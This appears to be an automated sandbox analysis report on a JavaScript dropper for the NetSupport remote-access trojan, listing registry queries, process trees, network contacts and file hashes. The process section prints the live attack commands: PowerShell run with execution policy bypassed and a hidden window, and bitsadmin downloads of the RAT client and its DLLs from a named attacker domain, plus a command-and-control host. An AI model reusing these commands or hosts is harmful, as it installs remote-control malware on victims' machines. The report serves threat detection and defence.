Malware Analysis Report

2025-04-13 09:51

Sample ID 230709-x1tsyagc3z
Target ave6608jsjsjsjsjsjsjsjsjs.js
SHA256 2b04eb3c0f95ecd1e2a5b74275d82ce3d92f8b153774a59fb7243d39b1b56ae9
Tags
netsupport rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2b04eb3c0f95ecd1e2a5b74275d82ce3d92f8b153774a59fb7243d39b1b56ae9

Threat Level: Known bad

The file ave6608jsjsjsjsjsjsjsjsjs.js was found to be: Known bad.

Malicious Activity Summary

netsupport rat

NetSupport

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Download via BitsAdmin

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-09 19:19

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-09 19:19

Reported

2023-07-09 19:23

Platform

win10v2004-20230703-en

Max time kernel

162s

Max time network

177s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js

Signatures

NetSupport

rat netsupport

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{EE35E43B-4C55-4094-8443-1411A2B5CF9F}.catalogItem C:\Windows\System32\svchost.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\svchost.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\System32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\svchost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\rakg3z3.ps1

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

"C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

Network

Country Destination Domain Proto
US 8.8.8.8:53 virvatulishop.com udp
FI 5.44.245.24:443 virvatulishop.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 24.245.44.5.in-addr.arpa udp
US 8.8.8.8:53 deperekanuki1.com udp
RU 5.42.74.53:5222 deperekanuki1.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 62.172.138.8:80 geo.netsupportsoftware.com tcp
GB 62.172.138.8:80 geo.netsupportsoftware.com tcp
GB 62.172.138.8:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 53.74.42.5.in-addr.arpa udp
US 8.8.8.8:53 8.138.172.62.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 254.150.241.8.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 38.148.119.40.in-addr.arpa udp

Files

memory/1656-137-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

memory/1656-138-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

memory/1656-141-0x0000026C59F20000-0x0000026C59F42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1e5lhyvm.ylq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\rakg3z3.ps1

MD5 3aca9681a54650494d37d91440ea8a78
SHA1 eda71218ed383e77a09058002bb0d1ea693a84cf
SHA256 6f606c666e1fac66c4057174ec83c76d635ea80c7354cc3f3d0871efc8f9a43b
SHA512 9eba188889a4b1f1dd521d50bf529fe6db4d060ca986d443df6fdb12b79d3c6b2bd63aa4791e441722376b5c2fdebd13cd5c389eb4445da35e3e8a5597fa7d6c

memory/1656-150-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

memory/1656-151-0x0000026C5C480000-0x0000026C5C494000-memory.dmp

memory/1656-152-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

memory/1656-153-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

memory/1656-154-0x0000026C5C4A0000-0x0000026C5C4B2000-memory.dmp

memory/1656-155-0x0000026C5C470000-0x0000026C5C47A000-memory.dmp

memory/1656-156-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.dll

MD5 9c9302e75c25c2ba996efd89a1047205
SHA1 9e79627ff32d5abd3382b65a509baeb31c78a7f2
SHA256 beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1
SHA512 d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.DLL

MD5 9c9302e75c25c2ba996efd89a1047205
SHA1 9e79627ff32d5abd3382b65a509baeb31c78a7f2
SHA256 beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1
SHA512 d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1

C:\Users\Admin\AppData\RoamingOfficeStartup\pcichek.dll

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICHEK.DLL

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\Users\Admin\AppData\RoamingOfficeStartup\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

memory/1656-202-0x0000026C5A070000-0x0000026C5A080000-memory.dmp

C:\Users\Admin\AppData\RoamingOfficeStartup\NSM.LIC

MD5 b9956282a0fed076ed083892e498ac69
SHA1 d14a665438385203283030a189ff6c5e7c4bf518
SHA256 fcc6afd664a8045bd61c398be3c37a97536a199a48d277e11977f93868ae1acc
SHA512 7daa09113c0e8a36c91cc6d657c65851a20dff6b60ac3d2f40c5737c12c1613c553955f84d131ba2139959973fef9fc616ca5e968cb16c25acf2d4739eed87eb

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.ini

MD5 a252f22f61f960c54fa32ae0de7dd17c
SHA1 00fe1097e70f1f6307e6bc68f40d49abb01dd2d5
SHA256 a5be7a73bbed8ec4e1a7819289da5412fe9ddf628941aa3b35fbe7454f148618
SHA512 7998e6cd43853b77e38cfedf0b6081c2965c9facb891ebd9a33db0e39b71d683f218174d87f99d5ab22983632c4c319bd63ec9dcbf1cbc81a77e3053ae3f1593

C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-09 19:19

Reported

2023-07-09 19:22

Platform

win7-20230705-en

Max time kernel

98s

Max time network

105s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3060 wrote to memory of 3000 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3060 wrote to memory of 3000 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3060 wrote to memory of 3000 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3000 wrote to memory of 3052 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 3052 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 3052 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2200 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 1380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 1380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 1380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 1092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 1092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 1092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 3000 wrote to memory of 2444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6608jsjsjsjsjsjsjsjsjs.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\z6ujb7u.ps1

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/HTCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/msvcr100.dll C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/nskbfltr.inf C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/NSM.LIC C:\Users\Admin\AppData\RoamingOfficeStartupNSM.LIC

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/pcicapi.dll C:\Users\Admin\AppData\RoamingOfficeStartuppcicapi.dll

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/PCICHEK.DLL C:\Users\Admin\AppData\RoamingOfficeStartupPCICHEK.DLL

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/PCICL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupPCICL32.DLL

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/remcmdstub.exe C:\Users\Admin\AppData\RoamingOfficeStartupremcmdstub.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 virvatulishop.com udp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp

Files

memory/3000-60-0x000000001B260000-0x000000001B542000-memory.dmp

memory/3000-61-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/3000-62-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/3000-63-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/3000-64-0x00000000024E0000-0x0000000002560000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\z6ujb7u.ps1

MD5 d8d4beafe295f925cf1e7c73667b99cb
SHA1 dc73efce5921033d72bbb09713b347f0e5b6358f
SHA256 82d78c24842eda98e42ff73b25fd97dd52ed9046c4c5e5200bb2ad760c18f9c3
SHA512 dfe68905caed73d5d61090598bab5db93e432098e37bf815243b7c031fd4403c3a1fbeab314edc22f466a22de521f8a2fa5bbf27356a958aafd56f2fa9feef21

memory/3000-66-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/3000-67-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/3000-68-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/3000-69-0x00000000024E0000-0x0000000002560000-memory.dmp